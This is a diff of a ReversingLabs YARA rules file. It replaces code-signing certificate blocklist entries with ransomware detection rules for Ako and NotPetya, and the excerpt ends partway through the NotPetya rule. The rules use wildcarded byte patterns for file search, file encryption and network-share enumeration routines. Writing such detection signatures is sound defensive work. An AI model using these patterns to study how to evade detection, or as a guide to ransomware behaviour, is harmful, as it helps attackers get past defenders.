+            ?? ?? 53 56 57 8B D9 89 54 24 ?? B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? BE ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? F3 A5 6A ?? 6A ?? 8D
+            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 66 A5 50 6A ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B
+            E5 5D C3 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? 8D 84 24 ??
+            ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F
+            5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 8D 44 24 ?? 50 FF 74 24
+            ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 43 ?? 8B 3D ?? ?? ?? ?? 50 89 44 24 ?? 89 44 24 ?? 8D 44 24 ??
+            50 6A ?? 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 51 BA
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 7B ?? ?? 72 ?? 8B 1B FF 74 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? FF
+            74 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 4C 24
+            ?? 8B 44 24 ?? 5F 89 01 8B C6 8B 8C 24 ?? ?? ?? ?? 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$enum_shares = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 75 ?? 8B 45 ?? 8D 4D ?? 51 50
+            6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ??
+            ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            0F 1F 40 ?? 33 DB 39 5D ?? 0F 8E ?? ?? ?? ?? 83 C7 ?? 66 90 F7 47 ?? ?? ?? ?? ?? 74
+            ?? 8D 47 ?? 89 45 ?? 8B 06 8B 48 ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D 55 ?? 52 FF 50
+            ?? E9 ?? ?? ?? ?? 8B 17 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 70 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C6 D1 F8 83 F8 ?? 77 ?? 8D 34 00
+            89 45 ?? 56 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 44 35 ?? EB ?? 52 C6
+            45 ?? ?? 8D 4D ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ??
+            50 8B 4E ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 83 C7 ??
+            3B 5D ?? 0F 8C ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 57 8D 45 ?? C7
+            45 ?? ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 FF 15 ??
+            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
+            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" and 1601830010 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files and $encrypt_files and $enum_shares )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ako ransomware."
 		author = "ReversingLabs"
-		id = "30108ce3-b133-5e1d-924f-7caaf390e836"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "00d67696-998c-5bc3-95e7-0320ca558cdb"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6086-L6102"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6986e7bd90842647ec6a168c30dca2d5ae8ae5b1c1014f966dd596a78859ac6e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ako.yara#L1-L152"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "488e9b528f75fcfaa8dd19859801e6e5a73575c33cd70c98ebaa9ae93025018b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ako"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_network_shares_win32_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 8B
+            4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45
+            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F
+            85 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95
+            ?? ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 52
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$encrypt_network_shares_win32_p2 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ??
+            ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52
+            8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ??
+            83 C2 ?? 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 45 ?? 73 ?? 83 7D ?? ?? 76 ?? 8B 45
+        }
+		$encrypt_network_shares_win32_p3 = {
+            33 D2 B9 ?? ?? ?? ?? F7 F1 85 D2 75 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? EB ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 55 ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8B 4D ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8A 45 ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
+            C2
+        }
+		$find_files_win32_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? 03
+            D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? 59 EB
+            ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E 5F 5B 8B E5 5D
+            C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74
+            ?? 0F B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B
+        }
+		$find_files_win32_p2 = {
+            8D ?? ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ??
+            ?? ?? ?? 83 C4 ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA 42
+            F7 D8 68 ?? ?? ?? ?? 1B C0 33 FF 23 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B
+            85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74
+            ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B
+            48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
+            ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 50 FF B5 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ??
+            ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? ?? 59 75 ?? 8B 10 8B 40 ?? 8B
+            8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50
+            8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$encrypt_files_win32_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 83 7D ?? ?? 74 ?? 83 7D ?? ??
+            75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32
+            C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ??
+            51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 C0 66 0F 13 85 ??
+            ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D
+            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? ?? ?? ?? 7C ?? 8B
+            8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 55 ?? 52
+        }
+		$encrypt_files_win32_p2 = {
+            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
+            68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
+            ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 3B 4D ??
+            0F 83 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 D0
+            85 D2 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9
+            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D
+            ?? 8B 95 ?? ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85
+        }
+		$encrypt_files_win32_p3 = {
+            8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51
+            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
+            8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 39 45 ?? 75 ?? 0F 57
+            C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D
+            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" and 1603230930 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_win32_p* ) ) and ( all of ( $encrypt_files_win32_p* ) ) and ( all of ( $encrypt_network_shares_win32_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Notpetya : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NotPetya ransomware."
 		author = "ReversingLabs"
-		id = "86644ef8-4218-5a04-9655-c7d51729872d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ea655048-4ef7-5dd7-872e-f1c2e38234cf"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6104-L6120"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f51556a8a12affbd7f7633bf8daa50e6332fa3d3448ea08853cf8ed28e593680"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.NotPetya.yara#L1-L73"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "328f0e527fee2145879ee13c003d375db832f7f3eacf7a1eb303393c1c8b5a36"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "NotPetya"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file = {
+            8B EC 83 EC ?? 53 56 57 33 F6 56 56 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 89
+            75 ?? 39 75 ?? 7C ?? B8 ?? ?? ?? ?? 7F ?? 39 45 ?? 76 ?? 89 45 ?? 8B D8 56 53 56 6A
+            ?? 56 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? FF 75 ?? 56 56 6A ?? 50 FF 15 ?? ??
+            ?? ?? 8B F8 3B FE 74 ?? 53 8D 45 ?? 50 8B 45 ?? 57 56 FF 75 ?? 56 FF 70 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B C9 C2 ?? ?? 8B 45 ?? 89 45 ?? C1
+            E8 ?? 8D 58 ?? C7 45 ?? ?? ?? ?? ?? C1 E3 ?? E9
+        }
+		$main = {
+            55 8B EC 8B 45 ?? 53 56 8B 35 ?? ?? ?? ?? 57 BF ?? ?? ?? ?? 57 6A ?? BB ?? ?? ?? ??
+            53 83 C0 ?? 6A ?? 50 FF D6 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 57 6A
+            ?? 6A ?? EB ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 6A ?? 53 8B 45 ?? 6A ?? 83 C0 ?? 50 FF D6
+            85 C0 74 ?? 8B 75 ?? 8B C6 E8 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? 56 E8 ?? ?? ?? ?? 56
+            E8 ?? ?? ?? ?? FF 76 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? EB ?? 8B
+            75 ?? 56 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 5D C2
+        }
+		$encryption_loop = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 8B 46 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? 66 8B 10
+            66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85
+            D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24
+            ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83
+            C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ??
+            50 FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44
